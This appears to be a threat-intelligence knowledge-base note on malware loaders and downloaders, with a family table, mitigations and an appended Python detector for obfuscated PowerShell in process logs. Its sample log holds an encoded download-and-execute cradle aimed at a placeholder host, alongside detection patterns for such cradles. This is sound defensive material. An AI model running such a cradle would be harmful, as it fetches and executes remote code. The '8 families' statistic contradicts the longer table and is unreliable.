# Loaders & Downloaders

> First-stage malware specialised in establishing an initial foothold and loading additional payloads. Loaders are the entry point of multi-layer infection chains and are frequently used to distribute ransomware, RATs and stealers at scale.

> [!warning] Gateway for Attacks at Scale
> Emotet, QakBot and BazarLoader were the main distributors of ransomware (Conti, LockBit, Ryuk) in the 2020-2023 period. Removing a loader eliminates the entire downstream distribution chain, which makes loaders priority targets for law enforcement takedowns.

## How They Work

Loaders perform a surgical function: infect as many machines as possible and keep access while downloading and executing high-value payloads on demand from the operators.

```mermaid
graph TB
    A["📧 MalSpam em Escala<br/>Milhoes de e-mails / dia"] --> B["📎 Documento Malicioso<br/>Word macro / PDF / LNK"]
    B --> C["🔧 Loader Executa<br/>Evade AV / Unpacks in-memory"]
    C --> D["📡 Beacon C2<br/>Registra novo bot"]
    D --> E["⬇️ Payload Download<br/>Ransomware / RAT / Stealer"]
    E --> F["🎯 Payload Executa<br/>Impacto final no sistema"]
    D --> G["🔄 Worm Module<br/>Espalha para rede local"]

    style A fill:#2980b9,color:#fff
    style B fill:#e74c3c,color:#fff
    style C fill:#e67e22,color:#fff
    style D fill:#f39c12,color:#fff
    style E fill:#8e44ad,color:#fff
    style F fill:#c0392b,color:#fff
    style G fill:#d35400,color:#fff
```

**Distinction between types:**

- **Loader** - Loads and executes the payload directly in memory (fileless), without writing to disk
- **Downloader** - Downloads files and executes them from disk; simpler and easier to detect
- **Dropper** - Extracts a payload embedded in its own executable; common in targeted attacks

## Catalogued Families

%%
```dataview
TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status"
FROM "cti/software/malware/loaders"
WHERE type = "malware"
SORT title ASC
```
%%

<!-- QueryToSerialize: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status" FROM "cti/software/malware/loaders" WHERE type = "malware" SORT title ASC -->
<!-- SerializedQuery: TABLE WITHOUT ID link(file.link, title) AS "Nome", malware-type AS "Subtipo", status AS "Status" FROM "cti/software/malware/loaders" WHERE type = "malware" SORT title ASC -->
| Name | Subtype | Status |
| -------------------------------------------------------------------------- | ---------- | -------- |
| [[s0469-abk\|ABK]] | loader | active |
| [[s0473-avenger\|Avenger]] | loader | active |
| [[s0642-badflick\|BADFLICK]] | loader | active |
| [[cti/software/malware/loaders/bazarloader.md\|BazarLoader]] | loader | inactive |
| [[s0470-bbk\|BBK]] | loader | active |
| [[s0520-blindingcan\|BLINDINGCAN]] | loader | active |
| [[s0635-boombox\|BoomBox]] | loader | active |
| [[s0415-boostwrite\|BOOSTWRITE]] | loader | active |
| [[s0471-builddowner\|build_downer]] | loader | active |
| [[bumblebee\|Bumblebee]] | loader | active |
| [[s0462-carrotbat\|CARROTBAT]] | loader | active |
| [[s0137-coreshell\|CORESHELL]] | loader | active |
| [[s0614-costabricks\|CostaBricks]] | loader | active |
| [[cuba\|Cuba]] | loader | active |
| [[s0472-downnew\|down_new]] | loader | active |
| [[s0134-downdelph\|Downdelph]] | loader | active |
| [[dridex\|Dridex]] | loader | active |
| [[s0624-ecipekac\|Ecipekac]] | loader | active |
| [[s0367-emotet\|Emotet]] | loader | active |
| [[s0696-flagpro\|Flagpro]] | downloader | active |
| [[s0628-fyanti\|FYAnti]] | loader | active |
| [[s0488-gelup\|GELUP]] | downloader | active |
| [[cti/software/malware/loaders/gh0st-rat.md\|gh0st RAT]] | rat | active |
| [[ghostpulse\|GHOSTPULSE]] | loader | active |
| [[s0499-hancitor\|Hancitor]] | loader | inactive |
| [[s0214-happywork\|HAPPYWORK]] | loader | active |
| [[s1249-hexeval-loader\|HexEval Loader]] | loader | active |
| [[s0203-hydraq\|Hydraq]] | loader | active |
| [[s0483-icedid\|IcedID]] | loader | active |
| [[icesxpert\|IceSXpert]] | loader | active |
| [[s1152-imaploader\|IMAPLoader]] | loader | active |
| [[s0585-kerrdown\|Kerrdown]] | loader | active |
| [[koctopus\|KOCTOPUS]] | loader | active |
| [[s0408-lazarus-loader\|Lazarus Loader]] | loader | active |
| [[s1095-lightlet\|Lightlet]] | loader | active |
| [[s1185-lightspy\|LightSpy]] | loader | active |
| [[s0680-litepower\|LitePower]] | loader | active |
| [[s0042-lowball\|LOWBALL]] | loader | active |
| [[matanbuchus\|Matanbuchus]] | loader | active |
| [[s0051-miniduke\|MiniDuke]] | loader | active |
| [[s0284-moreeggs\|More_eggs]] | loader | active |
| [[s0256-mosquito\|Mosquito]] | loader | active |
| [[s0247-navrat\|NavRAT]] | loader | active |
| [[s1170-odagent\|ODAgent]] | loader | active |
| [[s1172-oilbooster\|OilBooster]] | loader | active |
| [[s1171-oilcheck\|OilCheck]] | loader | active |
| [[s0264-oopsie\|OopsIE]] | loader | active |
| [[s0402-osxshlayer\|OSX/Shlayer]] | loader | active |
| [[s0626-p8rat\|P8RAT]] | loader | active |
| [[pikabot\|Pikabot]] | loader | active |
| [[s0254-plaintee\|PLAINTEE]] | loader | inactive |
| [[s0518-polyglotduke\|PolyglotDuke]] | loader | inactive |
| [[s0177-power-loader\|Power Loader]] | loader | inactive |
| [[s0685-powerpunch\|PowerPunch]] | loader | active |
| [[s1046-powgoop\|PowGoop]] | loader | active |
| [[cti/software/malware/loaders/privateloader.md\|PrivateLoader]] | loader | active |
| [[s0613-ps1\|PS1]] | loader | active |
| [[s1228-pubload\|PUBLOAD]] | loader | active |
| [[s0650-qakbot\|QakBot]] | loader | active |
| [[s0258-rgdoor\|RGDoor]] | loader | active |
| [[s1018-saint-bot\|Saint Bot]] | loader | active |
| [[s1168-samplecheck5000\|SampleCheck5000]] | loader | active |
| [[s1089-sharpdisco\|SharpDisco]] | loader | active |
| [[s0217-shutterspeed\|SHUTTERSPEED]] | loader | active |
| [[s0226-smokeloader\|SmokeLoader]] | loader | active |
| [[s1124-socgholish\|SocGholish]] | loader | active |
| [[s0516-sorefang\|SoreFang]] | loader | active |
| [[squirrelwaffle\|Squirrelwaffle]] | loader | active |
| [[s1238-staticplugin\|STATICPLUGIN]] | loader | active |
| [[s1064-svcready\|SVCReady]] | loader | active |
| [[s0386-ursnif\|Ursnif]] | loader | active |
| [[s0636-vaporrage\|VaporRage]] | loader | active |
| [[s0442-vbshower\|VBShower]] | loader | active |
| [[s1248-xorindex-loader\|XORIndex Loader]] | loader | active |
| [[s0388-yahoyah\|YAHOYAH]] | loader | active |
<!-- SerializedQuery END -->

> [!info] Statistics
> **8 families** catalogued (6 loaders + 2 downloaders)
> - The category with the fewest members but the greatest operational impact
> - Emotet and QakBot distributed most of the ransomware of 2020-2023

## Defenses and Mitigations

- [[m1049-antivirus-antimalware|M1049 - Antivirus/Antimalware]] - Detection of malicious macros in Office documents
- [[m1040-behavior-prevention-on-endpoint|M1040 - Behavior Prevention on Endpoint]] - Block the spawning of suspicious child processes
- Disable VBA macros in Office documents from external sources
- [[m1021-restrict-web-based-content|M1021 - Restrict Web-Based Content]] - Filter downloads from known C2 domains
- Monitor PowerShell execution with obfuscated parameters

## Related

[[_malware]] - [[_groups]]

- [[t1105-ingress-tool-transfer|T1105 - Ingress Tool Transfer]]
- [[t1204-002-malicious-file|T1204.002 - Malicious File]]
- [[t1059-001-powershell|T1059.001 - PowerShell]]
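Two of the mitigations listed above (block suspicious child processes, monitor PowerShell with obfuscated parameters) come down to the same telemetry: process-creation events where an Office application spawns a script host, or where PowerShell is launched with an encoded, hidden or download-oriented command line. The script below is an added example, not part of this note or of any tool it links to. It parses a constructed `key=value|key=value` process-creation record format (an assumption; real Sysmon Event ID 4688 or EventCode 1 records would be mapped to the same three fields), decodes `-EncodedCommand` payloads so the indicators inside them are visible, and returns the reasons an event was flagged. The log lines, paths and the `example.invalid` URL are constructed sample data.

```python
"""Flag Office-spawned script hosts and obfuscated PowerShell in process-creation logs.

Added example for the loader mitigation list; the log format and sample events
are constructed for the demonstration and are not taken from any real incident.
"""
import base64
import re
from dataclasses import dataclass

# Parents that should almost never launch a script host (assumed baseline for an office workstation).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts unambiguous prefixes of -EncodedCommand; the argument is base64 of UTF-16LE.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_FLAG = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
BYPASS_FLAG = re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                             r"invoke-expression|\biex\b|net\.webclient")


@dataclass
class Event:
    parent: str    # parent image file name, lower-cased
    image: str     # image file name, lower-cased
    cmdline: str   # raw command line


def parse_line(line):
    """Parse one constructed 'ParentImage=...|Image=...|CommandLine=...' record."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|") if "=" in part)
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    return Event(parent=basename(fields.get("ParentImage", "")),
                 image=basename(fields.get("Image", "")),
                 cmdline=fields.get("CommandLine", ""))


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyze(evt):
    """Return the list of reasons this event is suspicious (empty list means benign)."""
    reasons = []
    if evt.parent in OFFICE_PARENTS and evt.image in SCRIPT_HOSTS:
        reasons.append(f"office parent {evt.parent} spawned {evt.image}")
    if evt.image in {"powershell.exe", "pwsh.exe"}:
        text = evt.cmdline
        decoded = decode_encoded_command(text)
        if decoded is not None:
            reasons.append("encoded command")
            text = text + " " + decoded      # inspect the decoded payload too
        if HIDDEN_FLAG.search(text):
            reasons.append("hidden window")
        if BYPASS_FLAG.search(text):
            reasons.append("execution policy bypass")
        if DOWNLOAD_CRADLE.search(text):
            reasons.append("download cradle")
        # Backticks and carets are the usual string-splitting obfuscation characters.
        if text.count("`") + text.count("^") >= 4:
            reasons.append("string-splitting obfuscation")
    return reasons


def scan(lines):
    """Return [(Event, reasons)] for every flagged record, preserving log order."""
    flagged = []
    for line in lines:
        evt = parse_line(line)
        reasons = analyze(evt)
        if reasons:
            flagged.append((evt, reasons))
    return flagged


# Constructed sample log. The encoded command is built here so the base64 is exact.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")
).decode("ascii")

SAMPLE_LOG = [
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
    r"|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -w hidden -ep bypass -enc " + ENCODED_SAMPLE,
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell.exe -File C:\scripts\backup.ps1",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|Image=C:\Windows\System32\wscript.exe"
    r"|CommandLine=wscript.exe C:\Users\Public\inv.vbs",
]

if __name__ == "__main__":
    for evt, reasons in scan(SAMPLE_LOG):
        print(f"{evt.parent} -> {evt.image}: {', '.join(reasons)}")
```

Running it flags the Word-spawned PowerShell (encoded, hidden, policy bypass, download cradle) and the Excel-spawned wscript, while the interactive `notepad.exe` and the scheduled `-File backup.ps1` run stay quiet. Decoding `-EncodedCommand` before matching is the step that matters: the cradle indicators are invisible in the raw command line, which is exactly why loaders encode them.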